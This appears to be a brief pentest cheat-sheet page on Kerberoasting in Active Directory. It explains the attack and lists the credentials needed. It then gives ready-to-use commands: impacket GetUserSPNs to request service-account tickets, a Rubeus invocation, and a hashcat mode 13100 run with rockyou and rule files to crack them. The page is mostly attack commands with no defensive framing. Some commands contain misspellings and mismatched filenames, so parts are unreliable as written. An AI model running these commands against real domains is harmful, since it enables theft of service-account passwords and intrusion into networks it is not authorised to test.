Skip to main content

Kerberoasting


About the Attack

When client requests service tickets to DC in order to access resource hosted by SPN, No ckecks are performed on DC to provide service ticket are encrypted using SPN's password hash. We get the ticket & bruteforce the password hash hence it is called Kerberosting.


Gear Up (Prereqs)

we need below information in order to perform this attack

  • User access i.e. User:Password/NT Password Hash Or Kerberos Ticket.
  • Domain Controller IP

1. Using Kali Linux

This command will be used when launching the attack from kali linux(Non Domain Joined host)

sudo impacket-getuserSPNs -request -dc-ip $IP domain.com/user -save -outputfile User_spn

Using Rubeus

rubeus.exe kerberost /outfile:hasehs.kerberost

Crack The Collected hash

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also use custom rule or any other suitable wordlist.